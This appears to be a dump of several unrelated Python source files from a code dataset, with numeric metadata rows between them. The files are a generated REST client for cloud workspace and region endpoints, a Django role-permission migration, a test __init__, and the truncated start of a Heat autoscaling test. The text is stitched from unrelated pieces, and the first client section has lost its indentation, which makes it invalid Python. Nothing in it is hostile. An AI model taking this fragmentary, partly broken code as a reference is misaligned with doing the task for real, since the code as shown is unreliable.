If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_organization_list = _Endpoint(
settings={
'response_type': (CloudTfcOrganizationResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcOrganizations',
'operation_id': 'get_cloud_tfc_organization_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_organization_list
)
def __get_cloud_tfc_workspace_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.TfcWorkspace' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_workspace_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcWorkspace
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_workspace_by_moid = _Endpoint(
settings={
'response_type': (CloudTfcWorkspace,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcWorkspaces/{Moid}',
'operation_id': 'get_cloud_tfc_workspace_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_workspace_by_moid
)
def __get_cloud_tfc_workspace_list(
self,
**kwargs
):
"""Read a 'cloud.TfcWorkspace' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_workspace_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcWorkspaceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_workspace_list = _Endpoint(
settings={
'response_type': (CloudTfcWorkspaceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcWorkspaces',
'operation_id': 'get_cloud_tfc_workspace_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_workspace_list
)
def __patch_cloud_regions(
self,
moid,
cloud_regions,
**kwargs
):
"""Update a 'cloud.Regions' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cloud_regions(moid, cloud_regions, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
cloud_regions (CloudRegions): The 'cloud.Regions' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudRegions
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['cloud_regions'] = \
cloud_regions
return self.call_with_http_info(**kwargs)
self.patch_cloud_regions = _Endpoint(
settings={
'response_type': (CloudRegions,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/Regions/{Moid}',
'operation_id': 'patch_cloud_regions',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'cloud_regions',
'if_match',
],
'required': [
'moid',
'cloud_regions',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'cloud_regions':
(CloudRegions,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'cloud_regions': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_cloud_regions
)
def __update_cloud_regions(
    self,
    moid,
    cloud_regions,
    **kwargs
):
    """Update a 'cloud.Regions' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_cloud_regions(moid, cloud_regions, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        cloud_regions (CloudRegions): The 'cloud.Regions' resource to update.

    Keyword Args:
        if_match (str): Guards against the lost-update problem: set it to
            the ModTime obtained from a prior GET of the resource, and the
            server rejects the write with 412 (Precondition Failed) if the
            resource changed since it was fetched. [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a (connection,
            read) pair sets each timeout separately. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        CloudRegions
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in every framework option the caller did not supply;
    # setdefault leaves caller-provided values untouched, exactly like
    # the kwargs.get(...) pattern used elsewhere in this client.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    # Positional arguments travel through kwargs to the endpoint machinery.
    kwargs['moid'] = moid
    kwargs['cloud_regions'] = cloud_regions
    return self.call_with_http_info(**kwargs)
# _Endpoint descriptor for the update operation on
# /api/v1/cloud/Regions/{Moid}. Dispatches to the private
# __update_cloud_regions callable defined above; generated OpenAPI client
# code.
# NOTE(review): http_method is 'POST' for an update operation — presumably
# intentional for this API's update semantics; confirm against the spec.
self.update_cloud_regions = _Endpoint(
    settings={
        'response_type': (CloudRegions,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            # NOTE(review): 'oAuth2' appears twice — looks like a code
            # generator artifact; confirm against the OpenAPI spec.
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/cloud/Regions/{Moid}',
        'operation_id': 'update_cloud_regions',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'cloud_regions',
            'if_match',
        ],
        'required': [
            'moid',
            'cloud_regions',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        # Parameter name -> accepted Python types.
        'openapi_types': {
            'moid':
                (str,),
            'cloud_regions':
                (CloudRegions,),
            'if_match':
                (str,),
        },
        # Python parameter name -> wire (path/header) name.
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        # Where each parameter is placed in the HTTP request.
        'location_map': {
            'moid': 'path',
            'cloud_regions': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_cloud_regions
)
| 48.94448
| 1,678
| 0.520217
| 30,045
| 308,546
| 5.195573
| 0.020569
| 0.016547
| 0.013658
| 0.014183
| 0.959814
| 0.955804
| 0.942319
| 0.927041
| 0.924152
| 0.923063
| 0
| 0.002563
| 0.404445
| 308,546
| 6,303
| 1,679
| 48.952245
| 0.846938
| 0.457575
| 0
| 0.762032
| 0
| 0
| 0.223986
| 0.052467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009358
| false
| 0
| 0.009804
| 0
| 0.028521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dfdc564deb0868a084cd07a9b8d8cc131a47f798
| 7,846
|
py
|
Python
|
backend/api/migrations/0188_update_roles_permissions.py
|
amichard/tfrs
|
ed3973016cc5c2ae48999d550a23b41a5ddad807
|
[
"Apache-2.0"
] | 18
|
2017-05-10T21:55:11.000Z
|
2021-03-01T16:41:32.000Z
|
backend/api/migrations/0188_update_roles_permissions.py
|
amichard/tfrs
|
ed3973016cc5c2ae48999d550a23b41a5ddad807
|
[
"Apache-2.0"
] | 1,167
|
2017-03-04T00:18:43.000Z
|
2022-03-03T22:31:51.000Z
|
backend/api/migrations/0188_update_roles_permissions.py
|
amichard/tfrs
|
ed3973016cc5c2ae48999d550a23b41a5ddad807
|
[
"Apache-2.0"
] | 48
|
2017-03-09T17:19:39.000Z
|
2022-02-24T16:38:17.000Z
|
from django.db import migrations
from django.db.migrations import RunPython
def add_permissions(apps, schema_editor):
    """
    Adds the missing permissions to certain roles (forward migration).

    For each role below, creates RolePermission rows linking the role to
    the listed permission codes.

    Args:
        apps: migration-state app registry (use apps.get_model, not direct
            model imports, so historical models are used).
        schema_editor: provides the database alias the migration runs on.
    """
    db_alias = schema_editor.connection.alias
    permission_model = apps.get_model('api', 'Permission')
    role_model = apps.get_model('api', 'Role')
    role_permission = apps.get_model('api', 'RolePermission')

    def grant(role_name, codes):
        # Attach every permission in `codes` to the single role `role_name`.
        role = role_model.objects.using(db_alias).get(name=role_name)
        permissions = permission_model.objects.using(db_alias).filter(
            code__in=codes)
        role_permission.objects.using(db_alias).bulk_create([
            role_permission(role=role, permission=permission)
            for permission in permissions
        ])

    # Compliance Reporting
    grant("ComplianceReporting", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW",
        "CREDIT_CALCULATION_VIEW"
    ])
    # Signing Authority
    grant("FSManager", [
        "EDIT_FUEL_SUPPLIER", "VIEW_COMPLIANCE_REPORT"
    ])
    # File Submission
    grant("FSDocSubmit", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW"
    ])
    # File Submission (Government)
    grant("GovDoc", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "EDIT_PRIVILEGED_COMMENTS",
        "DOCUMENTS_LINK_TO_CREDIT_TRADE", "USE_HISTORICAL_DATA_ENTRY",
        "VIEW_FUEL_SUPPLIERS", "VIEW_PRIVILEGED_COMMENTS",
        "VIEW_APPROVED_CREDIT_TRANSFERS"
    ])
    # Administrator
    grant("Admin", [
        "EDIT_PRIVILEGED_COMMENTS", "EDIT_FUEL_SUPPLIER",
        "VIEW_PRIVILEGED_COMMENTS"
    ])
    # Director / Deputy Director: both roles get DOCUMENTS_VIEW.
    documents_view = permission_model.objects.using(db_alias).get(
        code="DOCUMENTS_VIEW")
    role_permission.objects.using(db_alias).bulk_create([
        role_permission(role=role, permission=documents_view)
        for role in role_model.objects.using(db_alias).filter(name__in=[
            "GovDeputyDirector", "GovDirector"
        ])
    ])
    # Compliance Manager
    # BUG FIX: the original list was missing a comma between
    # "VIEW_FUEL_SUPPLIERS" and "VIEW_PRIVILEGED_COMMENTS", so implicit
    # string concatenation produced the bogus code
    # "VIEW_FUEL_SUPPLIERSVIEW_PRIVILEGED_COMMENTS" and neither
    # permission was granted.
    grant("GovComplianceManager", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "ADD_COMMENT", "FUEL_CODES_VIEW",
        "PROPOSE_CREDIT_TRANSFER", "CREDIT_CALCULATION_MANAGE",
        "FUEL_CODES_MANAGE", "EDIT_PRIVILEGED_COMMENTS",
        "DOCUMENTS_LINK_TO_CREDIT_TRADE", "EDIT_FUEL_SUPPLIERS",
        "RECOMMEND_CREDIT_TRANSFER", "RESCIND_CREDIT_TRANSFER",
        "DOCUMENTS_GOVERNMENT_REVIEW", "USE_HISTORICAL_DATA_ENTRY",
        "CREDIT_CALCULATION_VIEW", "DOCUMENTS_VIEW", "VIEW_FUEL_SUPPLIERS",
        "VIEW_PRIVILEGED_COMMENTS", "VIEW_APPROVED_CREDIT_TRANSFERS"
    ])
def remove_permissions(apps, schema_editor):
    """
    Removes the permissions that were added by add_permissions (reverse
    migration).

    Args:
        apps: migration-state app registry.
        schema_editor: provides the database alias the migration runs on.
    """
    db_alias = schema_editor.connection.alias
    role_permission = apps.get_model('api', 'RolePermission')

    def revoke(role_name, codes):
        # Delete the RolePermission rows linking `role_name` to `codes`.
        role_permission.objects.using(db_alias).filter(
            permission__code__in=codes,
            role__name=role_name
        ).delete()

    # Compliance Reporting
    revoke("ComplianceReporting", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW",
        "CREDIT_CALCULATION_VIEW"
    ])
    # Signing Authority
    revoke("FSManager", [
        "EDIT_FUEL_SUPPLIER", "VIEW_COMPLIANCE_REPORT"
    ])
    # File Submission
    revoke("FSDocSubmit", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW"
    ])
    # File Submission (Government)
    revoke("GovDoc", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "EDIT_PRIVILEGED_COMMENTS",
        "DOCUMENTS_LINK_TO_CREDIT_TRADE", "USE_HISTORICAL_DATA_ENTRY",
        "VIEW_FUEL_SUPPLIERS", "VIEW_PRIVILEGED_COMMENTS",
        "VIEW_APPROVED_CREDIT_TRANSFERS"
    ])
    # Administrator
    revoke("Admin", [
        "EDIT_PRIVILEGED_COMMENTS", "EDIT_FUEL_SUPPLIER",
        "VIEW_PRIVILEGED_COMMENTS"
    ])
    # Director / Deputy Director
    role_permission.objects.using(db_alias).filter(
        permission__code="DOCUMENTS_VIEW",
        role__name__in=["GovDeputyDirector", "GovDirector"]
    ).delete()
    # Compliance Manager
    # BUG FIX: as in add_permissions, a missing comma between
    # "VIEW_FUEL_SUPPLIERS" and "VIEW_PRIVILEGED_COMMENTS" silently
    # concatenated the two codes, so those rows were never deleted.
    revoke("GovComplianceManager", [
        "LOGIN", "VIEW_CREDIT_TRANSFERS", "ADD_COMMENT", "FUEL_CODES_VIEW",
        "PROPOSE_CREDIT_TRANSFER", "CREDIT_CALCULATION_MANAGE",
        "FUEL_CODES_MANAGE", "EDIT_PRIVILEGED_COMMENTS",
        "DOCUMENTS_LINK_TO_CREDIT_TRADE", "EDIT_FUEL_SUPPLIERS",
        "RECOMMEND_CREDIT_TRANSFER", "RESCIND_CREDIT_TRANSFER",
        "DOCUMENTS_GOVERNMENT_REVIEW", "USE_HISTORICAL_DATA_ENTRY",
        "CREDIT_CALCULATION_VIEW", "DOCUMENTS_VIEW", "VIEW_FUEL_SUPPLIERS",
        "VIEW_PRIVILEGED_COMMENTS", "VIEW_APPROVED_CREDIT_TRANSFERS"
    ])
class Migration(migrations.Migration):
    """
    Attaches the functions for the migrations.
    """
    # Must apply after the previous migration in the 'api' app.
    dependencies = [
        ('api', '0187_auto_20190923_1556'),
    ]
    operations = [
        # RunPython(forward, reverse): remove_permissions undoes
        # add_permissions so the migration is reversible.
        RunPython(
            add_permissions,
            remove_permissions
        )
    ]
| 31.258964
| 79
| 0.639052
| 763
| 7,846
| 6.14941
| 0.129751
| 0.044757
| 0.083546
| 0.113384
| 0.804135
| 0.79561
| 0.765985
| 0.75682
| 0.75682
| 0.704604
| 0
| 0.00278
| 0.266505
| 7,846
| 250
| 80
| 31.384
| 0.812511
| 0.053276
| 0
| 0.715847
| 0
| 0
| 0.255394
| 0.16298
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010929
| false
| 0
| 0.010929
| 0
| 0.038251
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5f00a2b9bc15c70be8ac9e7ef2935adf7f5ab1fb
| 83
|
py
|
Python
|
test/__init__.py
|
coco673/TrustyBrowser
|
e88f09c0e7899d53eac266f9c83d2f8949303e0f
|
[
"Beerware"
] | null | null | null |
test/__init__.py
|
coco673/TrustyBrowser
|
e88f09c0e7899d53eac266f9c83d2f8949303e0f
|
[
"Beerware"
] | null | null | null |
test/__init__.py
|
coco673/TrustyBrowser
|
e88f09c0e7899d53eac266f9c83d2f8949303e0f
|
[
"Beerware"
] | null | null | null |
from .test_Reports import *
from .test_SSLTester import *
from .test_Test import *
| 20.75
| 29
| 0.783133
| 12
| 83
| 5.166667
| 0.416667
| 0.387097
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144578
| 83
| 3
| 30
| 27.666667
| 0.873239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5f3588af809e515ad843b69579083301e16da950
| 74,744
|
py
|
Python
|
heat/tests/test_autoscaling.py
|
redhat-openstack/heat
|
6b9be0a868b857e942c1cc90594d0f3a0d0725d0
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
redhat-openstack/heat
|
6b9be0a868b857e942c1cc90594d0f3a0d0725d0
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
redhat-openstack/heat
|
6b9be0a868b857e942c1cc90594d0f3a0d0725d0
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import mock
import mox
from oslo.config import cfg
from oslo.utils import timeutils
import six
from heat.common import exception
from heat.common import short_id
from heat.common import template_format
from heat.engine.notification import autoscaling as notification
from heat.engine import parser
from heat.engine import resource
from heat.engine.resources import autoscaling as asc
from heat.engine.resources import instance
from heat.engine.resources import loadbalancer
from heat.engine.resources.neutron import loadbalancer as neutron_lb
from heat.engine import rsrc_defn
from heat.engine import scheduler
from heat.tests.common import HeatTestCase
from heat.tests import utils
as_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "AutoScaling Test",
"Parameters" : {
"ImageId": {"Type": "String"},
"KeyName": {"Type": "String"}
},
"Resources" : {
"WebServerGroup" : {
"Type" : "AWS::AutoScaling::AutoScalingGroup",
"Properties" : {
"AvailabilityZones" : ["nova"],
"LaunchConfigurationName" : { "Ref" : "LaunchConfig" },
"MinSize" : "1",
"MaxSize" : "5",
"LoadBalancerNames" : [ { "Ref" : "ElasticLoadBalancer" } ]
}
},
"WebServerScaleUpPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "1"
}
},
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"ElasticLoadBalancer" : {
"Type" : "AWS::ElasticLoadBalancing::LoadBalancer",
"Properties" : {
"AvailabilityZones" : ["nova"],
"Listeners" : [ {
"LoadBalancerPort" : "80",
"InstancePort" : "80",
"Protocol" : "HTTP"
}]
}
},
"LaunchConfig" : {
"Type" : "AWS::AutoScaling::LaunchConfiguration",
"Properties": {
"ImageId" : {"Ref": "ImageId"},
"InstanceType" : "bar",
"BlockDeviceMappings": [
{
"DeviceName": "vdb",
"Ebs": {"SnapshotId": "9ef5496e-7426-446a-bbc8-01f84d9c9972",
"DeleteOnTermination": "True"}
}]
}
}
}
}
'''
as_template_bad_group = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Parameters" : {
"ImageId": {"Type": "String"},
"KeyName": {"Type": "String"}
},
"Resources" : {
"WebServerScaleUpPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : "not a real group",
"Cooldown" : "60",
"ScalingAdjustment" : "1"
}
}
}
}
'''
class AutoScalingTest(HeatTestCase):
